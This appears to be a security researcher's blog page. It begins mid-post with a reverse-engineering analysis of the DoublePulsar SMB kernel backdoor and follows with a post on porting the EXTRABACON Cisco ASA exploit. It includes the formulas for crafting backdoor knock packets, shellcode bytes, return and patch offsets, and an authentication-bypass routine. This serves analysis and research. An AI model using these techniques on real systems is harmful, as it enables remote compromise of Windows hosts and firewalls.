The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

Here is how x86 sees the first few bytes.

You'll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

And here is how x64 sees it:

The inc eax byte is instead the REX preamble for a NOP. So the zero flag is still set from the xor eax, eax operation. Since x64 has RIP-relative addressing it doesn't need to get the RIP register.

The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

Step 1: Find ntoskrnl.exe Base Address

Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

Fairly straightforward code. In user mode, the GS segment for x64 contains the Thread Information Block (TIB), which holds the Process Environment Block (PEB), a struct which contains all kinds of information about the current running process. In kernel mode, this segment instead contains the Kernel Process Control Region (KPCR), a struct which at offset zero actually contains the current process PEB.

This code grabs offset 0x38 of the KPCR, which is the "IdtBase" and contains a pointer struct of KIDTENTRY64. Those familiar with the x86 family will know this is the Interrupt Descriptor Table.

At offset 4 into the KIDENTRY64 struct you can get a function pointer to the interrupt handler, which is code defined inside of ntoskrnl.exe. From there it searches backwards in memory in 0x1000 increments (page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).

Step 2: Locate Necessary Function Pointers

Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.

The following functions are found:

ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.

Step 3: Locate Srv.sys SMB Driver

A feature of ZwQuerySystemInformation is a constant named SystemQueryModuleInformation, with the value 0xb. This gives a list of all loaded drivers in the system.

The shellcode then searched this list for two different hashes, and it landed on Srv.sys, which is one of the main drivers that SMB runs on.

The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

Step 4: Patch the SMB Trans2 Dispatch Table

Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

Inside of the .data section is generally global read/write memory, and stored here is the SrvTransaction2DispatchTable, an array of function pointers that handle different SMB tasks.

The shellcode allocates some memory and copies over the code for its function hook.

Next the shellcode stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.

That's it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

Step 5: Send "Knock" and Raw Shellcode

Now when DoublePulsar sends its specific "knock" requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a delta, which serves as a status code.

Operations are hidden in plain sight via steganography, which do not have proper dissectors in Wireshark.

The status codes (via MultiplexID delta) are:

0x10 = success
0x20 = invalid parameters
0x30 = allocation failure

The opcode list is as follows:

0x23 = ping
0xc8 = exec
0x77 = kill

You can tell which opcode was called by using the following algorithm:

t = SMB.Trans2.Timeout
op = (t) + (t >> 8) + (t >> 16) + (t >> 24);

Conversely, you can make the packet using this algorithm, where k is randomly generated:

op = 0x23
k = 0xdeadbeef
t = 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00

Sending a ping opcode in a Trans2 SESSION_SETUP request will yield a response that holds part of a XOR key that needs to be calculated for exec requests.

The "XOR key" algorithm is:

s = SMB.Signature1
x = 2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))

More shellcode can be sent with a Trans2 SESSION_SETUP request and exec opcode. The shellcode is sent in the "data payload" part of the packet 4096 bytes at a time, using the XOR key as a basic stream cipher. The backdoor will allocate an executable region of memory, decrypt and copy over the shellcode, and run it. The Inject DLL payload is simply some DLL loading shellcode prepended to the DLL you actually want to inject.

We can see the hook is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

And of course the full disassembly listing.

Conclusion

There you have it, a highly sophisticated, multi-architecture SMB backdoor. The world probably did not need a remote Windows kernel payload this advanced being spammed across the Internet. It's an unique payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard. It is unclear if newer versions of PatchGuard, such as those in Windows 10, already detect this hook. We can expect them to be added if not.

Usually we only get to see kernel shellcode in local exploits, as it swaps process tokens in order to privilege escalate. However, Microsoft does many networking things in the kernel, such as Srv.sys and HTTP.sys. The techniques demonstrated are in many ways completely analagous to how usermode shellcode operates during remote exploits.

If/when this gets ported over to Metasploit, I would probably not copy this verbatim, and rather skip the backdoor idea. It isn't the most secure thing to do, as it's not a big secret anymore and anyone else can come along and use your backdoor.

Here's what can be done instead:

Obtain ntoskrnl.exe address in the same fashion as DoublePulsar, and read export directory for necessary functions to perform the next operations.
Spawn a hidden process (such as notepad.exe).
Queue an APC with Meterpreter payload.
Resume process, and exit the kernel cleanly.

Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges. It does not open new ports, or have any real encryption or other features to prevent others from taking advantage of the same hole, making the attribution game for digital forensic investigators even more difficult. This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.

Saturday, September 17, 2016

Reverse Engineering Cisco ASA for EXTRABACON Offsets

Update Sept. 24: auxiliary/admin/cisco/cisco_asa_extrabacon is now in the Metasploit master repo. There is support for the original ExtraBacon leak and ~20 other newer versions.

Update Sept. 22: Check this GitHub repo for ExtraBacon 2.0, improved Python code, a Lina offset finder script, support for a few more 9.x versions, and a Metasploit module.

Background
Understanding the Exploit
Finding Offsets
Improving the Shellcode
Future Work

Background

On August 13, 2016 a mysterious Twitter account (@shadowbrokerss) appeared, tweeting a PasteBin link to numerous news organizations. The link described the process for an auction to unlock an encrypted file that claimed to contain hacking tools belonging to the Equation Group. Dubbed last year by Kaspersky Lab, Equation Group are sophisticated malware authors believed to be part of the Office of Tailored Access Operations (TAO), a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA). As a show of good faith, a second encrypted file and corresponding password were released, with tools containing numerous exploits and even zero-day vulnerabilities.

One of the zero-day vulnerabilities released was a remote code execution in the Cisco Adaptive Security Appliance (ASA) device. The Equation Group's exploit for this was named EXTRABACON. Cisco ASAs are commonly used as the primary firewall for many organizations, so the EXTRABACON exploit release raised many eyebrows.

At RiskSense we had spare ASAs lying around in our red team lab, and my colleague Zachary Harding was extremely interested in exploiting this vulnerability. I told him if he got the ASAs properly configured for remote debugging I would help in the exploitation process. Of course, the fact that there are virtually no exploit mitigations (i.e. ASLR, stack canaries, et al) on Cisco ASAs may have weighed in on my willingness to help. He configured two ASAs, one containing version 8.4(3) (which had EXTRABACON exploit code), and version 9.2(3) which we would target to write new code.

This blog post will explain the methodology for the following submissions to exploit-db.com:

There is detailed information about how to support other versions of Cisco ASA for the exploit. Only a few versions of 8.x were in the exploit code, however the vulnerability affected all versions of ASA, including all of 8.x and 9.x. This post also contains information about how we were able to decrease the Equation Group shellcode from 2 stages containing over 200+ bytes to 1 stage of 69 bytes.

Understanding the Exploit

Before we can begin porting the exploit to a new version, or improving the shellcode, we first need to know how the exploit works.

This remote exploit is your standard stack buffer overflow, caused by sending a crafted SNMP packet to the ASA. From the internal network, it's pretty much a guarantee with the default configuration. We were also able to confirm the attack can originate from the external network in some setups.

Hijacking Execution

The first step in exploiting a 32-bit x86 buffer overflow is to control the EIP (instruction pointer) register. In x86, a function CALL pushes the current EIP location to the stack, and a RET pops that value and jumps to it. Since we overflow the stack, we can change the return address to any location we want.

In the shellcode_asa843.py file, the first interesting thing to see is:

my_ret_addr_len = 4
my_ret_addr_byte = "\xc8\x26\xa0\x09"
my_ret_addr_snmp = "200.38.160.9"

This is an offset in 8.4(3) to 0x09a026c8. As this was a classic stack buffer overflow exploit, my gut told me this was where we would overwrite the RET address, and that there would be a JMP ESP (jump to stack pointer) here. Sometimes your gut is right:

The vulnerable file is called "lina". And it's an ELF file; who needs IDA when you can use objdump?

Stage 1: "Finder"

The Equation Group shellcode is actually 3 stages. After we JMP ESP, we find our EIP in the "finder" shellcode.

finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"

This code finds some pointer on the stack and jumps to it. The pointer contains the second stage.

We didn't do much investigating here as it was the same static offsets for every version. Our improved shellcode also uses this first stage.

Stage 2: "Preamble"

Observing the main Python source code, we can see how the second stage is made:

        wrapper = sc.preamble_snmp
        if self.params.msg:
            wrapper += "." + sc.successmsg_snmp
        wrapper += "." + sc.launcher_snmp
        wrapper += "." + sc.postscript_snmp

Ignoring successmsg_snmp (as the script --help text says DO NOT USE), the following shellcode is built:

It seems like a lot is going on here, but it's pretty simple.

A "safe" return address is XORed by 0xa5a5a5a5
1. unnecessary, yet this type of XOR is everywhere. The shellcode can contain null bytes so we don't need a mask
Registers smashed by the stack overflow are fixed, including the frame base pointer (EBP)
The fixed registers are saved (PUSHA = push all)
A pointer to the third stage "payload" (to be discussed soon) is found on the stack
- This offset gave us trouble. Luckily our improved shellcode doesn't need it!
Payload is called, and returns
The saved registers are restored (POPA = pop all)
The shellcode returns execution to the "safe" location, as if nothing happened

I'm guessing the safe return address is where the buffer overflow would have returned if not exploited, but we haven't actually investigated the root cause of the vulnerability, just how the exploit works. This is probably the most elusive offset we will need to find, and IDA does not recognize this part of the code section as part of a function.

If we follow the function that is called before our safe return, we can see why there are quite a few registers that need to be cleaned up.

These registers also get smashed by our overflow. If we don't fix the register values, the program will crash. Luckily the cleanup shellcode can be pretty static, with only the EBP register changing a little bit based on how much stack space is used.

Stage 3: "Payload"

The third stage is where the magic finally happens. Normally shellcode, as it is aptly named, spawns a shell. But the Equation Group has another trick up its sleeve. Instead, we patch two functions, which we called "pmcheck()" and "admauth()", to always return true. With these two functions patched, we can log onto the ASA admin account without knowing the correct password.

Note: this is for payload "pass-disable". There's a second payload, "pass-enable", which re-patches the bytes. So after you log in as admin, you can run a second exploit to clean up your tracks.

For this stage, there is payload_PMCHECK_DISABLE_byte and payload_AAAADMINAUTH_DISABLE_byte. These two shellcodes perform the same overall function, just for different offsets, with a lot of code reuse.

Here is the Equation Group PMCHECK_DISABLE shellcode:

There's some shellcode trickery going on, but here are the steps being taken:

First, the syscall to mprotect() marks a page of memory as read/write/exec, so we can patch the code
Next, we jump forward to right before the end of the shellcode
- The last 3 lines of the shellcode contain the code to "always return true"
The call instruction puts the current address (where patch code is) on the stack
The patch code address is pop'd into esi and we jump backwards
rep movs copies 4 bytes (ecx) from esi (source index) to edi (destination index), then we jump to the admauth() patch

The following is functional equivalent C code:

const void *PMCHECK_BOUNDS = 0x954c000;
const void *PMCHECK_OFFSET = 0x954cfd0;

const int32_t PATCH_BYTES = 0xc340c031;

sys_mprotect(PMCHECK_BOUNDS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
*PMCHECK_OFFSET = PATCH_BYTES;

In this case, PMCHECK_BYTES will be "always return true".

xor eax, eax   ; set eax to 0  -- 31 c0
inc eax        ; increment eax -- 40
ret            ; return        -- c3

Yes, my friends who are fluent in shellcode, the assembly is extremely verbose just to write 4 bytes to a memory location. Here is how we summarized everything from loc_00000025 to the end in the improved shellcode:

mov dword [PMCHECK_OFFSET], PMCHECK_BYTES

In the inverse operation, pass-enable, we will simply patch the bytes to their original values.

Finding Offsets

So now that we've reverse engineered the shellcode, we know what offsets we need to patch to port the exploit to a new Cisco ASA version:

The RET smash, which should be JMP ESP (ff e4) bytes
The "safe" return address, to continue execution after our shellcode runs
The address of pmcheck()
The address of admauth()

RET Smash

We can set the RET smash address to anywhere JMP ESP (ff e4) opcodes appear in an executable section of the binary. There is no shortage of the actual instruction in 9.2(3).

Any of these will do, so we just picked a random one.

Safe Return Address

This is the location to safely return execution to after the shellcode runs. As mentioned, this part of the code isn't actually recognized as a function by IDA, and also the same trick we'll use for the Authentication Functions (searching the assembly with ROPgadget) doesn't work here.

The offset in 8.4(3) is 0xad457e33 ^ 0xa5a5a5a5 = 0x8e0db96

This contains a very unique signature of common bytes we can grep for in 9.2(3).

Our safe return address offset is at 0x9277386.

Authentication Functions

Finding the offsets for pmcheck() and admauth() is pretty simple. The offsets in 8.4(3) are not XORed by 0xa5a5a5a5, but the page alignment for sys_mprotect() is.

We'll dump the pmcheck() function from 8.4(3).

We have the bytes of the function, so we can use the Python ROPGadget tool from Jonathan Salwan to search for those bytes in 9.2(3).

It's a pretty straightforward process, which can be repeated for admauth() offsets. Note that during this process, we get the unpatch bytes needed for the pass-enable shellcode.

Finding the page alignment boundaries for these offsets (for use in sys_mprotect()) is easy as well, just floor to the nearest 0x1000.

Improving the Shellcode

We were able to combine the Equation Group stages "preamble" and "payload" into a single stage by rewriting the shellcode. Here is a list of ways we shortened the exploit code:

Removed all XOR 0xa5a5a5a5 operations, as null bytes are allowed
Reused code for the two sys_mprotect() calls
Used a single mov operation instead of jmp/call/pop/rep movs to patch the code
General shellcode size optimization tricks (performing the same tasks with ops that use less bytes)

The lackadaisical approach to the shellcode, as well as the Python code, came as a bit of surprise as the Equation Group is probably the most elite APT on the planet. There's a lot of cleverness in the code though, and whoever originally wrote it obviously had to be competent. To me, it appears the shellcode is kind of an off-the-shelf solution to solving generic problems, instead of being custom tailored for the exploit.

By changing the shellcode, we gained one enormous benefit. We no longer have to find the stack offset that contains a pointer to the third stage. This step gave us so much trouble that we started experimenting with using an egg hunter. We know that the stack offset to the third stage was a bottleneck for SilentSignal as well (Bake Your Own EXTRABACON). But once we understood the overall operation of all stages, we were happy to just reduce the bytes and keep everything in the one stage. Not having to find the third stage offset makes porting the exploit very simple.

Future Work

The Equation Group appeared to have generated their shellcode. We have written a Python script that will auto-port the code to different versions. We find offsets using similar heuristics to what ROPGadget offers. Of course, you can't trust a tool 100% (in fact, some of the Equation Group shellcode crashes certain versions). So we are testing each version.

We're also porting the Python code to Ruby, so the exploit will be part of Metasploit. Our Metasploit module will contain the new shellcode for all Shadow Broker versions, as well as offsets for numerous versions not part of the original release, so keep an eye out for it.

Subscribe to: Posts ( Atom )